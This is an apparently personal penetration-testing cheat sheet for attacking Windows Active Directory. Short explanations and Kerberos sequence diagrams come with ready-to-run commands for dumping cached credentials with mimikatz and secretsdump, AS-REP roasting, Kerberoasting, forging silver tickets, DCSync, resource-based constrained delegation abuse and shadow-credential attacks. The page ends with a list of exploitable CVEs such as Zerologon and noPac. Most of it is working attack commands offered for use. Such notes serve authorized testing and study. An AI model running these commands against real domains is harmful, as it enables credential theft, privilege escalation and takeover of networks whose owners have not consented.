⚔️ AD Exploitation

Basic Kerberos Authentication

sequenceDiagram
    participant C as Client
    participant AS as Authentication Server
    participant TGS as Ticket Granting Server
    participant S as Service

    C->>AS: AS-REQ (with credentials)
    AS-->>C: AS-REP (TGT, Session Key for TGS)
    Note right of C: Stores TGT and session key to talk with TGS

    C->>TGS: TGS-REQ (TGT, Authenticator, SPN of Service)
    TGS-->>C: TGS-REP (Service Ticket, Session Key for Service)
    Note right of C: Now has a ticket & session key to talk with Service

    C->>S: AP-REQ (Service Ticket, Authenticator)

Dumping Cached AD Credentials

Info

SYSTEM privileges are needed

# linux
impacket-secretsdump -target-ip <target_ip> <domain>/<user>:<pass>@<target_ip>

# win
.\mimikatz.exe
privilege::debug

# dump cached NTLM hashes on the current system
sekurlsa::logonpasswords

# dump tickets
sekurlsa::tickets

# one-liner
.\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"

AS-REP Roasting

Attack that exploits accounts with Do not require Kerberos preauthentication enabled to obtain and crack TGTs offline, revealing the user's NTLM hash.

sequenceDiagram
    participant Attacker
    participant KDC

    Attacker->>KDC: AS-REQ (Username, "Pre-Authentication Not Required")
    activate KDC
    KDC-->>Attacker: AS-REP (TGT encrypted with user's NTLM hash)
    deactivate KDC

    Attacker->>Attacker: Offline Cracking (Attempt to crack TGT to reveal NTLM hash)

Info

🐈‍⬛ Hashcat mode -> 18200

# linux
impacket-GetNPUsers <domain>/ -dc-ip <ip> -request -no-pass -usersfile <valid_users>
kerbrute userenum -d <domain> --dc <ip> <valid_users>

# windows
.\Rubeus.exe asreproast /nowrap

Kerberoasting

Attack that targets service accounts by requesting service tickets for their SPNs, to then crack them to get the service account's password.

sequenceDiagram
    participant Attacker
    participant KDC
    participant Service

    Attacker->>KDC: AS_REQ (Valid User Credentials)
    activate KDC
    KDC-->>Attacker: AS_REP (TGT)
    deactivate KDC

    Attacker->>KDC: TGS_REQ (TGT, SPN of target service)
    activate KDC
    KDC-->>Attacker: TGS_REP (Service Ticket encrypted with service account's password)
    deactivate KDC

    Attacker->>Attacker: Offline Cracking (Attempt to crack service ticket)

    Attacker->>Service: AP_REQ (Service Ticket, Authenticator)
    activate Service
    Service-->>Attacker: Access Granted
    deactivate Service

Info

🐈‍⬛ Hashcat mode -> 13100

# sync local time with server if error
ntpdate <dc_ip>

impacket-GetUserSPNs -request -dc-ip <ip> <domain>/<user>

# windows
.\Rubeus.exe kerberoast /simple

TargetedKerberoast

This tool tries to set SPNs on users without one abusing write permission (like GenericWrite) on the servicePrincipalName attribute.

https://github.com/ShutdownRepo/targetedKerberoast

targetkerberoast.py -d <domain> -u <user> -p <pass> --request-user <target_user>

Silver Ticket

Is a forged Kerberos Ticket Granting Service (TGS) ticket that allows an attacker to gain unauthorized access to a specific service, bypassing the need to request a ticket from the Key Distribution Center (KDC) after initial authentication.

sequenceDiagram
    participant Attacker
    participant Target Service

    Attacker->>Attacker: Extracts NTLM hash of Service Account
    Attacker->>Attacker: Creates forged TGS (Silver Ticket)
    Attacker->>Target Service: Forged AP-REQ (Sends forged TGS to access service)
    Target Service-->>Attacker: AP-REP (Grants unauthorized access)

Three pieces of info are needed:

• SPN password hash
• Domain SID
• Target SPN

Windows

# windows 
# SPN hash
.\mimikatz.exe
privilege::debug
sekurlsa::logonpasswords

# domain SID
whoami /user
# take everything except the last part; only the domain SID, not the user RID

# target SPN
setspn -L <account_name>

# forge the ticket
kerberos::golden /sid:S-1-5-21-1987370270-658905905-1781884369 /domain:corp.com /ptt /target:web04.corp.com /service:http /rc4:4d28cf5252d39971419580a51484ca09 /user:jeffadmin
exit

# show saved tickets
klist

# access the service
iwr -UseDefaultCredentials <servicename>://<computername>

Linux

# SPN hash
echo -n 'password' | iconv -t utf16le | openssl dgst -md4

# domain SID
impacket-getPac <domain>/<user>:<pass> -targetUser Administrator

# target SPN (shows up after GetUserSPNs)

# forge the ticket
impacket-ticketer -nthash <hash> -domain-sid <sid> -domain <domain> -spn <spn> <user>

# export the ticket
export KRB5CCNAME=<ticket>.ccache

# show saved tickets
klist

# access the target
impacket-psexec <domain>/<user>@<target> -k -no-pass

DCSync

Is an attack that allows an attacker with sufficient privileges to request password hashes and other sensitive information directly from a domain controller, effectively mimicking the behavior of a legitimate domain controller replicating data.

The user needs the following permissions or must belong to a privileged group:

• Replicating Directory Changes
• Replicating Directory Changes All
• Replicating Directory Changes in Filtered Set

Info

🐈‍⬛ Hashcat mode -> 1000

# linux
impacket-secretsdump -just-dc-user <target_user> <domain>/<user>:<pass>@<dc_ip>

# windows
.\mimikatz.exe
lsadump::dcsync /user:<domain\user>

# one-liner
.\mimikatz.exe "lsadump::dcsync /user:<domain>\<user>" "exit"

RBCD (Resource-Based Constrained Delegation)

A Resource-Based Constrained Delegation allows an attacker with write access to a computer object's delegation attribute to impersonate any user on that computer, enabling privilege escalation or lateral movement.

https://github.com/tothi/rbcd-attack (From outside of the domain)

# Create a new computer
impacket-addcomputer <domain>/<user> -computer-name 'evilcomputer$' -computer-pass 'ev1lP@sS' -dc-ip <ip> -hashes :<hash>

# Add the related security descriptor of the newly created EVILCOMPUTER to the `msDS-AllowedToActOnBehalfOfOtherIdentity` property of the target computer
python rbcd.py -f EVILCOMPUTER -t <computer> -dc-ip <ip> <domain>\<user> -hashes :<hash>
python rbcd.py -f EVILCOMPUTER -t <computer> -dc-ip <ip> '<domain>\<user>:<password>'

# Fetch a CIFS Service Ticket on behalf of the targeted domain user admin and store it in the file admin.ccache
impacket-getST -spn cifs/<computer>.<domain> -impersonate administrator -dc-ip <ip> <domain>/EVILCOMPUTER$:ev1lP@sS

Export the ticket and access the computer as administrator

export KRB5CCNAME=administrator@cifs_<computer>.<domain>@<DOMAIN>.ccache

impacket-psexec -k <computer>.<domain>

Shadow Credentials

Shadow credentials abuse involves adding a malicious certificate to a user or computer object, allowing attackers to authenticate as that principal using PKINIT (Kerberos certificate authentication).

Requirements:

• The Domain Controller must have a server authentication digital certificate installed.
• Write access to msDS-KeyCredentialLink attribute on the target object.

https://github.com/ShutdownRepo/pyWhisker

# Add a shadow credential to the target user/computer
python pywhisker.py --action add -d <domain> -u <user> -p <pass> --target <target_user> --filename <cert_name>

# Request a TGT using the shadow credential
python gettgtpkinit.py -cert-pfx <cert_name.pfx> -pfx-pass <pass> <domain>/<user> <user>.ccache

# Export the ticket for use with other tools
export KRB5CCNAME=<ticket>.ccache

# Get users's NTLM hash
python getnthash.py -key <key> <domain>/<user>

CVEs and Exploits

• CVE-2020-1472 - Zerologon
• MS14-068 - Golden Pac impacket-goldenPac
• CVE-2021-42278 and CVE-2021-42287 - noPac